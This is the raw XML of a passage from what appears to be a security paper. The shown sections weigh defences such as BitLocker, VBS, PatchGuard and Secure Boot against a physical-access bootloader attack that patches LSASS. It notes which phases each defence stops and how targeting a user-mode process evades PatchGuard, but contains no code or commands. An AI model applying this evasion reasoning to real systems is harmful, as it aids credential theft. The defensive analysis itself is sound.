        <w:t xml:space="preserve"> is critical to understanding the attack’s scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E59608" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7.1 Full Disk Encryption (BitLocker): Fundamental Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B996F6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="112" w:line="261" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1708" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why it works: </w:t>
      </w:r>
      <w:r>
        <w:t>If the system drive is encrypted, the bootloader cannot read the kernel binary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ntoskrnl.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>winload.efi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, or any driver files. Without reading these files, the bootloader cannot calculate offsets or identify where to inject the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E11DFA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attack failure mode: </w:t>
      </w:r>
      <w:r>
        <w:t>- Bootloader can boot from external media - Bootloader cannot read encrypted drive - Bootloader cannot inject payload or patch kernel - Attack fails at Phase I/II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847EC05" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Current status: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BitLocker is widely deployed in enterprise environments, making this attack impractical in many scenarios. However: - Encryption must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">enabled before reboot </w:t>
      </w:r>
      <w:r>
        <w:t>(RAM is not encrypted) - Cold boot attacks can extract encryption keys from RAM - Some implementations have known weaknesses (fixed in newer versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A363A62" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="281" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r>
        <w:t>[7], [23]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A8EC8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7.2 Virtualization-Based Security (VBS): Memory Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF44595" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How it works: </w:t>
      </w:r>
      <w:r>
        <w:t>VBS creates a secure, isolated memory region outside the normal kernel’s access. When enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E1E14" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1619" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSASS runs in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Trust Level 1 (VTL 1) </w:t>
      </w:r>
      <w:r>
        <w:t>(secure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F749A89" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1619" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kernel runs in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual Trust Level 0 (VTL 0) </w:t>
      </w:r>
      <w:r>
        <w:t>(normal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67597F97" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1619" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Memory between VTL 0 and VTL 1 is hardware-protected by the hypervisor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80AD94" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="1619" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Even Ring 0 code in VTL 0 cannot access VTL 1 memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FEBEB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why the attack fails: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeStackAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>API switches page tables in VTL 0, but this provides no access to VTL 1 memory. The hypervisor enforces hardware-level isolation that cannot be bypassed by software running in VTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A789A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD18ACF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attack failure mode: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Bootloader injection succeeds - Kernel payload injection succeeds - LSASS location succeeds - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeStackAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>succeeds - Memory read/write operations fail (hardware-protected) - Patch cannot be applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6D908" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation: </w:t>
      </w:r>
      <w:r>
        <w:t>VBS requires: - UEFI firmware with IOMMU (Input/Output Memory Management Unit) - CPU with virtualization extensions (Intel VT-x, AMD-V) - Windows 11 or Windows 10 with VBS enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6780B35D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VBS is becoming increasingly prevalent in modern systems and is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mandatory for Windows 11 Pro/Enterprise editions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DDE1D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="283"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r>
        <w:t>[21], [22], [23]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EECFFB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.3 Kernel Patch Protection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>): Partial Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ADBB09" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As discussed in Section 2.2.2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a detection mechanism rather than a prevention mechanism. It monitors kernel structures but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECFC7E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Does not monitor all memory regions with equal intensity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F5EC4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Cannot prevent patches to user-mode processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56035BBF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Has a brief initialization window before activation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3805B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:t>Cannot monitor the SMM (System Management Mode) region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C01853" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Limitation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">By targeting LSASS (user-mode) rather than kernel structures, the attack avoids </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PatchGuard’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scope of protection entirely. This is why the attack focuses on process-specific modifications rather than kernel-wide hooks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71E5E4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="283"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r>
        <w:t>[7], [8], [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D4F70" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7.4 Secure Boot: Firmware-Level Integrity Checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D8661" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How it works: </w:t>
      </w:r>
      <w:r>
        <w:t>UEFI Secure Boot verifies the digital signature of the bootloader against a whitelist of authorized keys before executing it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C891978" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why it’s insufficient: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Signing keys are stored in firmware (not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usercontrolled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) - Bootloader can be replaced if firmware is physically </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflashed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Some firmware implementations have known vulnerabilities - Secure Boot can be disabled in many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>consumer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2EF87" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Limitation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">While Secure Boot is a significant improvement over no verification, it does not prevent all bootloader replacement attacks—only unsigned bootloaders. A determined attacker with hardware access may bypass it through firmware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or exploitation of firmware vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57B197" w14:textId="54CAF282" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r>
        <w:t>[1], [24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFA56E" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3844D5A2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="336" w:right="673" w:hanging="324"/>
      </w:pPr>
      <w:r>
        <w:t>Discussion: Physical Access as an Authentication Factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C47148" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>8.1 The Asymmetry of Security Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AB14B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This paper has demonstrated a fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B077CC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="535" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Physical Access &gt; Software Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF06FA8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This is not a flaw in Windows specifically, but a consequence of the PC architecture and the nature of digital security. A few concrete examples illustrate this principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF82964" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5474"/>
        </w:tabs>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Component</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Weakened By</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158D0DD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5701"/>
        </w:tabs>
        <w:spacing w:after="2"/>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D6E47C7" wp14:editId="0AC49867">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>16828</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-260223</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4365130" cy="386749"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="14744" name="Group 14744"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4365130" cy="386749"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4365130" cy="386749"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1467" name="Shape 1467"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4365130" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4365130">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="436513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469" name="Rectangle 1469"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1428356" y="44820"/>
                            <a:ext cx="977361" cy="168278"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="45C40E36" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>Protected</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="17"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>By</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1471" name="Shape 1471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="217322"/>
                            <a:ext cx="4365130" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4365130">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4365130" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="6327" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1473" name="Rectangle 1473"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1428356" y="260224"/>
                            <a:ext cx="699869" cy="168278"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="022FC2ED" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>Firmware</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7D6E47C7" id="Group 14744" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.35pt;margin-top:-20.5pt;width:343.7pt;height:30.45pt;z-index:-251658240" coordsize="43651,3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4bBXwMAAGgMAAAOAAAAZHJzL2Uyb0RvYy54bWzsV9tu1DAQfUfiH6y809y2yW60uxVqoUJC&#10;tGrLB3gT5yI5dmR7L+XrGU/i7HYLBYpUEKIP6fg2Hp+Zc+ydn+1aTjZM6UaKhReeBB5hIpdFI6qF&#10;9/nu/ZupR7ShoqBcCrbw7pn2zpavX823XcYiWUteMEXAidDZtlt4tTFd5vs6r1lL9YnsmIDBUqqW&#10;Gmiqyi8U3YL3lvtRECT+VqqiUzJnWkPvRT/oLdF/WbLcXJWlZobwhQexGfwq/K7s11/OaVYp2tVN&#10;PoRBnxFFSxsBm46uLqihZK2aR67aJldSy9Kc5LL1ZVk2OcMzwGnC4Og0l0quOzxLlW2rboQJoD3C&#10;6dlu80+bS9XddtcKkNh2FWCBLXuWXala+x+iJDuE7H6EjO0MyaFzEienYQzI5jAWT5N0MusxzWsA&#10;/tGyvH739ELfbes/CGbbQXnoPQL69xC4rWnHEFidAQLXijQFVO8kST0iaAt1ijMI9iAwOG+ESWca&#10;EHsWRlhy4ylplq+1uWQSgaabj9r0FVk4i9bOynfCmQrq+smK7qix62yE1iTbfaZsXys37E7iqDnK&#10;EYS2H+XicNaYa1cGMLefAYbdZjkfDNwa7MPDcWGjCIMwiqBaKHC95NQgadrGgAjwpoXxKA0ChxEX&#10;4NGmvkcbLXPPmQ2cixtWQtqgBkN0olW1OueKbKilOv7ZSsQYYapdUzacj6uC766yUynvajr4GtwM&#10;G6DLwZOdyVBljt3mQzS91ABhgSJOcCCkcRGGJYUZ1wuQSdzw4LTWXMniHkmKgAAXLF1fhhQzR4ob&#10;KDsqKs4sMZDnNgQg0I+JEU6iaXyaeARqZzKZRoPyOhmZpWmchL2KhMk0SqcD6E6DOtXThFhj4VkC&#10;YP4cZWzhDVMspLZyaCbke8i4K4JHtWR2qx0M7tEltVRfruA2K7mEWgWSoOXZCw42taMe4R8EqI+9&#10;S5yhnLFyhjL8XOKN04fxdm1k2VhqY/b6XA6Nl0xlChA/1DfoGSD4qTTCsSGBUZjGwGJYCJX8LT13&#10;BHbZO9QBlzG4K/9VkUviCC6S/xpnn19Oev9ujUtjR4xDjYPeXyHHocZFSRBFk4cUSWazKcgmPpVe&#10;VOT61407S68+f07r8GUHz1m8SIent